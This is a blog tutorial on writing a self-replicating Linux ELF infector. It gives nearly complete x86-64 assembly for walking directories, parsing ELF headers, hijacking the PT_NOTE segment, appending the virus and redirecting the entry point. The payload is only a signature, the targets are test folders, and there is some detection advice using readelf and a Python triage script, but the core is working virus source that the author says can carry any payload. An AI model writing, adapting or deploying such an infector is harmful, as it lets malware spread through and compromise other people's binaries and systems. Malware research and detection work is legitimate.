Infectors: how to make a simple self-replicating program on Linux.
Introduction⌗
In this post, we will learn how to code a simple ELF infector on Linux. This infector spreads by self-replicating inside the other binaries it finds, and it runs whenever an infected binary is launched so that it can spread even further. The payload is harmless: just a signature attesting that the binary has been infected. The infector is very basic and makes no attempt at disguise. Any reverse engineer could see that a file has been infected by running a simple readelf command (we will get more into that later).
You can check the full source code here
How does it work ?⌗
The technique that we will use here is called PT_NOTE segment hijacking. To understand how it works, we first need to understand the ELF format. An ELF file starts with the ELF header, which gives us the information we need to read the rest of the file. Then comes the program header table, which describes how the file is organized. Each program header describes a part of the file, and a given part can belong to several program headers. Each entry is described by the following C structure (see man elf for more information).
typedef struct {
uint32_t p_type;
uint32_t p_flags;
Elf64_Off p_offset;
Elf64_Addr p_vaddr;
Elf64_Addr p_paddr;
uint64_t p_filesz;
uint64_t p_memsz;
uint64_t p_align;
} Elf64_Phdr;
The p_type field describes what kind of program header it is. Two types interest us:
-
PT_LOAD: The array element specifies a loadable segment, described by p_filesz and p_memsz. The bytes from the file are mapped to the beginning of the memory segment. If the segment's memory size p_memsz is larger than the file size p_filesz, the "extra" bytes are defined to hold the value 0 and to follow the segment's initialized area. The file size may not be larger than the memory size. Loadable segment entries in the program header table appear in ascending order, sorted on the p_vaddr member.
-
PT_NOTE: The array element specifies the location of notes (ElfN_Nhdr).
PT_LOAD segments are loaded into memory, which means that with the right permissions, we can execute their content. The PT_NOTE segment simply gives the location of notes that the program does not need during its execution. There should be a PT_NOTE segment in every binary compiled the usual way. The technique consists in changing this PT_NOTE header into a PT_LOAD header pointing to the end of the file, where we will put our code. This way, our code gets mapped into memory without altering the file too much, and we will be able to execute it.
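To get a feel for the program header table, here is a minimal Python sketch that walks it the way `readelf -l` does and picks out the PT_NOTE entry and the last PT_LOAD entry. It assumes a little-endian ELF64 image already read into memory; the function names `program_headers` and `note_and_last_load` are made up for this illustration and are not part of the infector's source.

```python
import struct

PT_LOAD, PT_NOTE = 1, 4

# Elf64_Phdr, little-endian: p_type, p_flags, p_offset, p_vaddr,
# p_paddr, p_filesz, p_memsz, p_align (56 bytes in total).
PHDR = struct.Struct("<IIQQQQQQ")


def program_headers(image: bytes):
    """Return every program header of an ELF64 image as a tuple."""
    # In the ELF64 header, e_phoff lives at offset 0x20, and
    # e_phentsize / e_phnum live at offsets 0x36 / 0x38.
    (e_phoff,) = struct.unpack_from("<Q", image, 0x20)
    e_phentsize, e_phnum = struct.unpack_from("<HH", image, 0x36)
    return [PHDR.unpack_from(image, e_phoff + i * e_phentsize)
            for i in range(e_phnum)]


def note_and_last_load(image: bytes):
    """Return (PT_NOTE header or None, last PT_LOAD header or None)."""
    note = last_load = None
    for phdr in program_headers(image):
        if phdr[0] == PT_NOTE:
            note = phdr
        elif phdr[0] == PT_LOAD:
            last_load = phdr
    return note, last_load
```

Calling `note_and_last_load(open(path, "rb").read())` on an ordinary binary should return two tuples whose fields line up with the columns printed by `readelf -l`.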
To execute it, we need to look a bit more closely at the ELF header structure, defined as:
#define EI_NIDENT 16
typedef struct {
unsigned char e_ident[EI_NIDENT];
uint16_t e_type;
uint16_t e_machine;
uint32_t e_version;
ElfN_Addr e_entry;
ElfN_Off e_phoff;
ElfN_Off e_shoff;
uint32_t e_flags;
uint16_t e_ehsize;
uint16_t e_phentsize;
uint16_t e_phnum;
uint16_t e_shentsize;
uint16_t e_shnum;
uint16_t e_shstrndx;
} ElfN_Ehdr;
The field that interests us here is e_entry, which defines the entrypoint of the program. If we point it at our code, the program will execute it first, and we will just have to transfer the execution back to the original entrypoint so that the program can keep its course.
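The header layout above can be read from Python with a single `struct` format. This is only a sketch for inspecting a file, assuming a little-endian ELF64 header; `EHDR`, `FIELDS` and `read_ehdr` are names chosen for this example.

```python
import struct

# Elf64_Ehdr, little-endian, in the same order as the C structure above.
EHDR = struct.Struct("<16sHHIQQQIHHHHHH")
FIELDS = ("e_ident", "e_type", "e_machine", "e_version", "e_entry",
          "e_phoff", "e_shoff", "e_flags", "e_ehsize", "e_phentsize",
          "e_phnum", "e_shentsize", "e_shnum", "e_shstrndx")


def read_ehdr(image: bytes) -> dict:
    """Decode the first 64 bytes of an ELF64 image into a field dictionary."""
    return dict(zip(FIELDS, EHDR.unpack_from(image, 0)))
```

For the Hello World binary inspected at the end of this post, `hex(read_ehdr(data)["e_entry"])` would be expected to match the "Entry point" line printed by readelf.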
The code⌗
Filesystem reading⌗
The first thing to do is to find files to infect. For safety reasons, and because we don't want to launch our program as root, we will not look for them in /bin or /usr/bin but in /tmp/test and /tmp/test2.
_start:
push rbp
mov rbp, rsp
sub rsp, 0x10
lea rdi, [rel cwd]
mov rsi, O_DIRECTORY | O_RDONLY
xor eax, eax
add al, SYS_OPEN
syscall
mov [rsp], eax ; We open and save the fd of the cwd so that we will be able
; to chdir back to it after we are done
lea rdi, [rel dir1] ; /tmp/test
call readdir
lea rdi, [rel dir2] ; /tmp/test2
call readdir
mov edi, [rsp]
xor eax, eax
add al, SYS_FCHDIR
syscall ; Back to our initial cwd to not break the executed binary (eg. ls)
mov edi, [rsp]
xor eax, eax
add eax, SYS_CLOSE
syscall
leave
This code chunk calls the readdir function, which we use to run through the files in both target directories. To open those files afterwards, we want to use relative paths and avoid string operations, which are a bit painful in ASM, so readdir will chdir into each target directory. To avoid breaking the infected program (eg ls), our first step is therefore to open our current working directory so that we can get back to it once the job is done.
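The same save-and-restore pattern for the working directory can be sketched in a few lines of Python: keep a file descriptor on ".", change directory, do the work, then `fchdir` back. The helper name `visit` is hypothetical and only illustrates the idea; it is not taken from the infector's source.

```python
import os


def visit(directory, action):
    """Run action() with `directory` as the cwd, then restore the old cwd."""
    # A descriptor on "." stays valid even after we chdir elsewhere.
    saved = os.open(".", os.O_RDONLY | os.O_DIRECTORY)
    try:
        os.chdir(directory)
        return action()
    finally:
        os.fchdir(saved)  # go back even if action() raised
        os.close(saved)
```

Holding a descriptor rather than a path string means nothing has to be copied or concatenated, which is the same reason the assembly version prefers it.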
readdir:
push rbp
mov rbp, rsp
sub rsp, 0x20
mov eax, SYS_CHDIR ; Let's change the directory to open file,
; string operations are painful in ASM so relative paths will do
syscall
mov rsi, O_DIRECTORY | O_RDONLY
xor eax, eax
add eax, SYS_OPEN
syscall
mov [rsp], eax
xor rdi, rdi
mov rsi, 0x1000
add rdx, PROT_READ | PROT_WRITE
mov r10, MAP_ANONYMOUS | MAP_PRIVATE
xor r8, r8
dec r8
xor r9, r9
xor eax, eax
add al, SYS_MMAP
syscall ; We map a page for the getdents buffer
test al, al
jnz end_readdir
mov [rsp + 0x8], rax
loop_dir:
mov edi, [rsp]
mov rsi, [rsp + 0x8]
mov rdx, DIRENT_MAX_SIZE
xor eax, eax
add al, SYS_GETDENTS64
syscall
cmp eax, 0
jle end_readdir
mov [rsp + 0x4], eax
xor r8, r8
loop_buf_dirent:
mov [rsp + 0x10], r8w
mov r9, [rsp + 0x8]
cmp BYTE [r9 + r8 + d_type], DT_REG
jne next_dirent
lea rdi, [r9 + r8 + d_name]
call infect ; We only infect regular files
next_dirent:
mov r9, [rsp + 0x8]
movzx r8, WORD [rsp + 0x10]
add r8w, [r9 + r8 + d_reclen]
cmp r8w, [rsp + 4]
jl loop_buf_dirent
jmp loop_dir
end_readdir:
mov edi, [rsp]
xor eax, eax
add eax, SYS_CLOSE
syscall
mov rdi, [rsp + 0x8]
mov rsi, 0x1000
mov eax, SYS_MUNMAP
syscall
leave
ret
With the readdir
function, we will loop through all the linux_dirent64
structures present in each of the target directories. If the current structure describes a regular file, we will call the infect
function with its name as argument to try to infect it.
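The buffer filled by getdents64 is a sequence of variable-length records, each one starting with d_ino (8 bytes), d_off (8 bytes), d_reclen (2 bytes) and d_type (1 byte), followed by the NUL-terminated name. The Python sketch below walks such a buffer and keeps the regular files. It works on a byte string rather than issuing the syscall itself, and `pack_dirent` is a made-up helper that only exists to build sample buffers.

```python
import struct

DT_DIR, DT_REG = 4, 8
# Fixed part of linux_dirent64: d_ino, d_off, d_reclen, d_type (19 bytes).
DIRENT_HDR = struct.Struct("<QqHB")


def pack_dirent(name: str, d_type: int) -> bytes:
    """Build one sample record, padded to 8 bytes (illustration only)."""
    raw = name.encode() + b"\0"
    reclen = (DIRENT_HDR.size + len(raw) + 7) & ~7
    head = DIRENT_HDR.pack(1, 0, reclen, d_type)
    return head + raw.ljust(reclen - DIRENT_HDR.size, b"\0")


def regular_files(buf: bytes):
    """Yield the name of every DT_REG record found in a getdents64 buffer."""
    pos = 0
    while pos + DIRENT_HDR.size <= len(buf):
        _ino, _off, reclen, d_type = DIRENT_HDR.unpack_from(buf, pos)
        if reclen < DIRENT_HDR.size:
            raise ValueError("corrupt record length")
        name = buf[pos + DIRENT_HDR.size:pos + reclen].split(b"\0", 1)[0]
        if d_type == DT_REG:
            yield name.decode()
        pos += reclen  # d_reclen is the distance to the next record


sample = pack_dirent("a.out", DT_REG) + pack_dirent("subdir", DT_DIR)
print(list(regular_files(sample)))
```

One caveat worth keeping in mind: some filesystems report d_type as DT_UNKNOWN (0), in which case a check on DT_REG alone skips the entry.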
Preliminary checks⌗
The infect function is the main function of our program. To make the code cleaner, I've defined a structure called Infection_struct in defines.s. By treating the stack frame as this structure, I can use its fields as local variable names.
infect:
push rbp
mov rbp, rsp
sub rsp, INFECTOR_STRUCT_SIZE
mov esi, O_RDWR
mov eax, SYS_OPEN
syscall
cmp eax, 0
jl quit_infect
mov [rsp + inf_fd], eax
mov edi, [rsp + inf_fd]
lea rsi, [rsp + inf_elfhdr]
mov rdx, ELFHDR_SIZE
mov eax, SYS_READ
syscall
lea rbx, [rsp + inf_elfhdr]
lea rax, [rbx + e_ident]
cmp [rax], DWORD ELF_MAGIC
jne close_quit_infect
cmp [rax + EI_CLASS], BYTE ELFCLASS64
jne close_quit_infect
cmp [rax + EI_DATA], BYTE ELFDATA2LSB ; Only ELF 64 bits are being taken into account
jne close_quit_infect
cmp [rax + EI_PAD], DWORD INFECTION_MAGIC ; We check them to avoid double infection
je close_quit_infect
mov rdx, [rax + e_phnum]
test rdx, rdx
je close_quit_infect
mov ax, [rbx + e_type]
cmp ax, ET_EXEC
je right_type_check
cmp ax, ET_DYN
jne close_quit_infect
The first part of this function is just about parsing the ELF header to check for several things:
- The file is a valid ELF file
- It is either an executable file or a shared object file
- It has not been infected yet
Since reinfecting a file is useless and only wastes space, we will prevent that from happening. In the e_ident field of the ELF header, there are some padding bytes that are unused and zero-filled. We will put an infection marker there to keep track of the already infected binaries.
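The same checks are handy from the other side, when scanning a directory for marked files. Here is a small Python sketch of them. It assumes that any non-zero byte in the e_ident padding (index 9 and up) counts as a marker, since the actual INFECTION_MAGIC value is not shown in this post; `classify` is a name invented for the example.

```python
import struct

ELF_MAGIC = b"\x7fELF"
EI_CLASS, EI_DATA, EI_PAD = 4, 5, 9
ELFCLASS64, ELFDATA2LSB = 2, 1
ET_EXEC, ET_DYN = 2, 3


def classify(header: bytes) -> str:
    """Classify the first 64 bytes of a file using the checks listed above."""
    if len(header) < 64 or header[:4] != ELF_MAGIC:
        return "not-elf"
    if header[EI_CLASS] != ELFCLASS64 or header[EI_DATA] != ELFDATA2LSB:
        return "unsupported"
    (e_type,) = struct.unpack_from("<H", header, 16)
    if e_type not in (ET_EXEC, ET_DYN):
        return "unsupported"
    # Assumption: the padding is zero-filled unless something wrote a marker.
    if any(header[EI_PAD:16]):
        return "marked"
    return "clean"
```

Reading the first 64 bytes of each file in a directory and passing them to `classify` is enough to list the candidates that carry a marker.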
right_type_check:
mov edi, [rsp + inf_fd]
xor rsi, rsi
mov rdx, SEEK_END
mov eax, SYS_LSEEK
syscall
mov [rsp + inf_filesize], rax
mov rsi, rax
xor rdi, rdi
mov rdx, PROT_READ | PROT_WRITE
mov r10, MAP_SHARED
mov r8d, [rsp + inf_fd]
xor r9, r9
mov eax, SYS_MMAP
syscall ; We map the file into memory to operate on it
test al, al
jnz close_quit_infect
mov [rsp + inf_map], rax
mov [rax + e_ident + EI_PAD], DWORD INFECTION_MAGIC ; Mark binary for infection
mov QWORD [rsp + inf_notehdr], 0
mov r8, rax
add r8, [rax + e_phoff]
movzx rcx, WORD [rax + e_phnum]
loop_phdrs:
cmp [r8 + p_type], DWORD PT_NOTE
jne cmp_load_phdr
mov QWORD [rsp + inf_notehdr], r8
cmp_load_phdr:
cmp [r8 + p_type], DWORD PT_LOAD
jne next_phdr
mov QWORD [rsp + inf_last_pt_load], r8
next_phdr:
add r8w, [rax + e_phentsize]
loop loop_phdrs
check_if_note_exists:
mov rax, [rsp + inf_notehdr]
test rax, rax
jz munmap_quit_infect
This next code chunk maps the file into memory and gathers some information that will be useful for the infection routine, such as:
- the file size
- the PT_NOTE phdr address
- the last PT_LOAD phdr address
Infection⌗
Once we have all the information we need, we can get to the serious part.
patch_note_phdr:
mov rax, [rsp + inf_notehdr]
mov [rax + p_type], DWORD PT_LOAD ; We make it loadable
mov [rax + p_flags], DWORD PF_R | PF_X ; And executable
mov rdx, QWORD [rsp + inf_filesize] ; It starts at the EOF
mov QWORD [rax + p_offset], rdx
mov QWORD [rax + p_filesz], virus_len ; We update the sizes
mov QWORD [rax + p_memsz], virus_len
mov QWORD [rax + p_align], 0x1000 ; And the alignment
mov rdx, [rsp + inf_last_pt_load]
mov rcx, [rdx + p_vaddr] ; we get the last page used
and cx, 0xf000 ; we align the address on page border
add rcx, [rsp + inf_filesize] ; and we add the file size to it so that
; it will be on another page and also to keep
; offset and address consistent
mov [rax + p_vaddr], rcx ; We put it after the last address mapped into memory
mov [rax + p_paddr], rcx ; but we have to align it on another page
sub rax, [rsp + inf_map] ; We convert our infected segment's address to
mov [rsp + inf_notehdr], rax ; an offset in case remapping changes the map address
This is the code that handles the PT_NOTE hijacking. If we want our code to execute, the new PT_LOAD header has to be valid, so we have to change a lot of its fields.
- p_type: We switch it from PT_NOTE to PT_LOAD to tell the system that we want our code mapped into memory.
- p_flags: For PT_LOAD segments, this field defines the permissions granted to the segment. We give it read and execute permissions because that's all it needs.
- p_offset: This field defines where the segment starts in the file. Since we are going to put our code at the end of the file, we put the file size here.
- p_filesz and p_memsz: These tell the system how much room to reserve in memory and how many bytes of the file to put in it. We set both to the virus length (we will see how to get it later).
- p_paddr and p_vaddr: These are the physical and virtual addresses where the segment will be mapped. The man page says that "Loadable process segments must have congruent values for p_vaddr and p_offset, modulo the page size." So we take the address of the last existing PT_LOAD, round it down to a page boundary, and add the file size to it. That puts the segment on another page and guarantees that the offset and the address are congruent.
- p_align: Loadable segments are aligned on memory pages, so we set it to the usual page size (0x1000 bytes).
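The congruence rule is easy to check by hand. The Python sketch below redoes the arithmetic with the values that appear in the readelf output at the end of this post (last PT_LOAD at 0x3de8, original file size 0x40e0). The function names are invented for the example, and the 0x1000 page size is the one assumed throughout the post.

```python
PAGE = 0x1000


def is_congruent(p_offset: int, p_vaddr: int, page: int = PAGE) -> bool:
    """True when offset and address agree modulo the page size."""
    return p_offset % page == p_vaddr % page


def hijacked_vaddr(last_load_vaddr: int, file_size: int, page: int = PAGE) -> int:
    """Round the last PT_LOAD address down to a page, then add the file size."""
    return (last_load_vaddr & ~(page - 1)) + file_size


vaddr = hijacked_vaddr(0x3de8, 0x40e0)
print(hex(vaddr))                   # 0x70e0
print(is_congruent(0x40e0, vaddr))  # True
```

Because the rounded-down address is a multiple of the page size, adding the file size to it leaves the low 12 bits equal to those of p_offset, which is why the rule holds whatever the file size is.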
adjust_file_size:
mov edi, [rsp + inf_fd]
mov rsi, [rsp + inf_filesize]
add rsi, virus_len
mov QWORD [rsp + inf_new_filesize], rsi
mov eax, SYS_FTRUNCATE
syscall
test eax, eax
jnz munmap_quit_infect
mov rdi, [rsp + inf_map]
mov rsi, [rsp + inf_filesize]
mov rdx, [rsp + inf_new_filesize]
xor r10, r10
add r10b, MREMAP_MAYMOVE
mov eax, SYS_MREMAP
syscall
test al, al
jnz munmap_quit_infect
mov [rsp + inf_map], rax ; This might break the reference to the phdrs
; but they are not needed anymore
mov rdi, [rsp + inf_map]
add rdi, [rsp + inf_filesize]
lea rsi, [rel _start]
mov rcx, virus_len
copy_payload:
lodsb
stosb
loop copy_payload
patch_entrypoint:
mov r8, [rsp + inf_map]
mov rax, r8
add rax, [rsp + inf_notehdr]
mov rdx, [r8 + e_entry] ; We save the old entrypoint
mov rcx, [rax + p_vaddr]
mov QWORD [r8 + e_entry], rcx ; We change the entrypoint to our code
add rcx, final_jmp_offset ; The address to patch
sub rdx, rcx ; We have the relative jump
mov rcx, [rax + p_offset]
add rcx, r8
add rcx, final_jmp_offset - 4 ; The file offset of the address to patch
mov DWORD [rcx], edx ; We return to the original entrypoint
munmap_quit_infect:
mov rdi, [rsp + inf_map]
mov rsi, [rsp + inf_filesize]
mov eax, SYS_MSYNC
syscall
mov rdi, [rsp + inf_map]
mov rsi, [rsp + inf_filesize]
mov eax, SYS_MUNMAP
syscall
close_quit_infect:
mov edi, [rsp + inf_fd]
mov eax, SYS_CLOSE
syscall
quit_infect:
leave
ret
signature: db 0, SIGNATURE, 0
dir1: db "/tmp/test/", 0
dir2: db "/tmp/test2/", 0
cwd: db ".", 0
_end:
xor rdi, rdi
mov eax, SYS_EXIT
syscall
Once our new segment has been created, it is time to put the code inside the file. Since we are working with a memory-mapped file, we first need to extend the file and remap it. Once this has been done, we just go to the previous end of the file and copy the payload there. To get the size of our payload, we use the _end label that we put at the end, so that we can define virus_len as _end - _start.
Once our payload has been copied, the last step is to hijack the control flow to get it executed. To do that, we first add the following lines to _start:
jmp _end
final_jmp_offset equ $ - _start
With this jmp, the program cleanly quits after its first execution. We can also reuse this jmp to jump back to the original entrypoint after the virus has run. In x86_64 assembly, a near jump is encoded as an opcode followed by a relative offset, and that offset is counted from the address of the next instruction, which is exactly what the final_jmp_offset label marks.
We can therefore obtain the offset with the formula: old_entrypoint_address - (new_entrypoint_address + final_jmp_offset).
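When looking at appended code in a disassembler, the same rule lets us work out where such a jump lands. This is a minimal Python sketch assuming the 5-byte `jmp rel32` form (opcode 0xE9); the address 0x7100 used in the example is made up, while 0x1050 is the original entrypoint shown in the readelf output later in this post.

```python
import struct


def jmp_rel32_target(insn_addr: int, insn: bytes) -> int:
    """Return the destination of a 5-byte `jmp rel32` located at insn_addr."""
    if len(insn) < 5 or insn[0] != 0xE9:
        raise ValueError("not a jmp rel32")
    (disp,) = struct.unpack_from("<i", insn, 1)  # signed 32-bit displacement
    return insn_addr + 5 + disp  # relative to the next instruction


# A jump sitting at the hypothetical address 0x7100 and going back to 0x1050.
insn = b"\xe9" + struct.pack("<i", 0x1050 - (0x7100 + 5))
print(hex(jmp_rel32_target(0x7100, insn)))  # 0x1050
```

The displacement is negative here because the original entrypoint sits below the appended segment.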
Once we have replaced the jmp offset in the copied code, everything is set, but there is still one thing to do for the infector to fully work: preserve the registers.
Indeed, the host program's startup code might expect particular values in some of the registers that we used (at process entry, for instance, rdx holds a function pointer that the C runtime registers with atexit), so we push those important registers at the very beginning of our program and pop them just before the final jump.
Conclusion⌗
We can now infect any 64-bit ELF on our system and have it execute anything we want if we insert a real payload, but we have a problem: our technique is not stealthy at all, and it can be spotted with readelf.
readelf is a Linux command that lets us inspect ELF files. We will use it with the -l option to display the program headers of a simple Hello World written in C, before and after infection.
Elf file type is DYN (Shared object file)
Entry point 0x1050
There are 11 program headers, starting at offset 64
Program Headers:
Type Offset VirtAddr PhysAddr
FileSiz MemSiz Flags Align
PHDR 0x0000000000000040 0x0000000000000040 0x0000000000000040
0x0000000000000268 0x0000000000000268 R 0x8
INTERP 0x00000000000002a8 0x00000000000002a8 0x00000000000002a8
0x000000000000001c 0x000000000000001c R 0x1
[Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]
LOAD 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000560 0x0000000000000560 R 0x1000
LOAD 0x0000000000001000 0x0000000000001000 0x0000000000001000
0x00000000000001bd 0x00000000000001bd R E 0x1000
LOAD 0x0000000000002000 0x0000000000002000 0x0000000000002000
0x0000000000000158 0x0000000000000158 R 0x1000
LOAD 0x0000000000002de8 0x0000000000003de8 0x0000000000003de8
0x0000000000000248 0x0000000000000250 RW 0x1000
DYNAMIC 0x0000000000002df8 0x0000000000003df8 0x0000000000003df8
0x00000000000001e0 0x00000000000001e0 RW 0x8
NOTE 0x00000000000002c4 0x00000000000002c4 0x00000000000002c4
0x0000000000000044 0x0000000000000044 R 0x4
GNU_EH_FRAME 0x0000000000002014 0x0000000000002014 0x0000000000002014
0x000000000000003c 0x000000000000003c R 0x4
GNU_STACK 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 RW 0x10
GNU_RELRO 0x0000000000002de8 0x0000000000003de8 0x0000000000003de8
0x0000000000000218 0x0000000000000218 R 0x1
This is what a normal file looks like. It has 4 load segments, including a single executable one for the code and a single writable one for the data. It also has a NOTE header that points to notes about the program.
After the infection, it looks more like this:
Elf file type is DYN (Shared object file)
Entry point 0x70e0
There are 11 program headers, starting at offset 64
Program Headers:
Type Offset VirtAddr PhysAddr
FileSiz MemSiz Flags Align
PHDR 0x0000000000000040 0x0000000000000040 0x0000000000000040
0x0000000000000268 0x0000000000000268 R 0x8
INTERP 0x00000000000002a8 0x00000000000002a8 0x00000000000002a8
0x000000000000001c 0x000000000000001c R 0x1
[Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]
LOAD 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000560 0x0000000000000560 R 0x1000
LOAD 0x0000000000001000 0x0000000000001000 0x0000000000001000
0x00000000000001bd 0x00000000000001bd R E 0x1000
LOAD 0x0000000000002000 0x0000000000002000 0x0000000000002000
0x0000000000000158 0x0000000000000158 R 0x1000
LOAD 0x0000000000002de8 0x0000000000003de8 0x0000000000003de8
0x0000000000000248 0x0000000000000250 RW 0x1000
DYNAMIC 0x0000000000002df8 0x0000000000003df8 0x0000000000003df8
0x00000000000001e0 0x00000000000001e0 RW 0x8
LOAD 0x00000000000040e0 0x00000000000070e0 0x00000000000070e0
0x000000000000038a 0x000000000000038a R E 0x1000
GNU_EH_FRAME 0x0000000000002014 0x0000000000002014 0x0000000000002014
0x000000000000003c 0x000000000000003c R 0x4
GNU_STACK 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 RW 0x10
GNU_RELRO 0x0000000000002de8 0x0000000000003de8 0x0000000000003de8
0x0000000000000218 0x0000000000000218 R 0x1
We can now see that there is another load segment with execute permission. It is super weird and should not be there at all. We can also notice that, obviously, the NOTE segment has disappeared. Another odd thing is that the entrypoint now points into that new segment. In a binary like this one, the code segment is mapped at 0x1000 and the entrypoint sits near the beginning of it (0x1050 before infection), so 0x70e0 definitely doesn't look legit. This is how you can tell that this file is not legitimate and probably infected, without even needing to analyze it properly.
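These observations can be turned into a quick triage script. The Python sketch below takes the entrypoint and a simplified list of program headers, and reports the three oddities discussed above. They are heuristics, not proof: a legitimate binary can trip one of them, so treat a hit as a reason to look closer. The function name and the tuple layout are assumptions made for this example.

```python
PT_LOAD, PT_NOTE = 1, 4
PF_X = 1


def suspicious_signs(entry, phdrs):
    """phdrs is a list of (p_type, p_flags, p_vaddr, p_memsz) tuples."""
    signs = []
    loads = [p for p in phdrs if p[0] == PT_LOAD]
    if not any(p[0] == PT_NOTE for p in phdrs):
        signs.append("no PT_NOTE segment")
    if sum(1 for p in loads if p[1] & PF_X) > 1:
        signs.append("more than one executable PT_LOAD")
    if loads:
        top = max(loads, key=lambda p: p[2])  # PT_LOAD mapped highest
        if top[1] & PF_X and top[2] <= entry < top[2] + top[3]:
            signs.append("entry point inside the highest PT_LOAD")
    return signs


# Values copied from the two readelf listings above.
clean = [(1, 4, 0x0, 0x560), (1, 5, 0x1000, 0x1bd), (1, 4, 0x2000, 0x158),
         (1, 6, 0x3de8, 0x250), (4, 4, 0x2c4, 0x44)]
infected = clean[:4] + [(1, 5, 0x70e0, 0x38a)]
print(suspicious_signs(0x1050, clean))     # []
print(suspicious_signs(0x70e0, infected))  # all three signs
```

The tuples can be produced from a real file by parsing its program header table and keeping the p_type, p_flags, p_vaddr and p_memsz fields.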
Luckily for us, we are going to learn how to make an infector that does not induce any peculiar change in the ELF file structure. It will keep the original entrypoint, and it will change neither the number of load segments nor their permissions.
Part 2. Advanced infectors: How to make our infector stealthy and hardly detectable